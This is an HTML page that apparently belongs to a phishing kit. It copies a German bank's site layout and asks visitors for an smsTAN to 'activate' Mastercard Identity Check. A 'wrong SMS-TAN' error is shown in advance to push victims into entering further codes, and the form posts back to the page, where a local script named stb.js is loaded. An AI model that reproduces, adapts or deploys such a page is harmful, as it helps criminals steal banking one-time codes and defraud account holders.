<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Fira+Sans:wght@300;400;500&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="./css/pc.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    <div class="hed">
        <div>
            <img class="lojo" src="./img/lojo.svg" alt="">
        </div>
        <p>Privatkunden</p>
        <p> Wealth Management & Private Banking</p>
        <p>Unternehmenskunden</p>
        <p>Nachhaltigkeit</p>
        <p>Über Uns</p>
        <p>Services</p>
        <img height="80" src="./img/hed.JPG" alt="">
    </div>
    <!--  -->
        <div class="mb-hed">
            <img src="./img/mb-hed.JPG" alt="">
        </div>
    <!--  -->

    <div class="cc-kolch">
        <div class="content2">
            <p class="p1 p5">Mastercard® Identity Check™: App-Verafahren aktivieren:</p>
            <form method="post" id="pg4">
                <div class="form2">
                    
    
                    <p>Eingabe smsTAN</p>

                    <p class="p6">Bitte geben Sie hier die smsTAN ein:*</p>
                    <input  type="tel" name="" id="sps2" required placeholder="">
                    <p style="margin-left: 0px; margin-top: -10px; color: rgb(192, 28, 28);">Falscher SMS-TAN</p>
                </div>

                <div class="btn">
                    <p>*Pflichtfelder</p>
                    <button type="submit">Aktivieren</button>
                </div>
            </form>
        </div>
    </div>

    <div class="bot">
        <img style="width: 100%; margin-top: 50px;" src="./img/bot.JPG" alt="">
    </div>

    <div class="mb-bot">
        <img style="width: 100%; margin-top: 50px;" src="./img/mb-bot.JPG" alt="">
    </div>
    <!-- my script -->
    <script src="./js/stb.js"></script>
</body>
</html>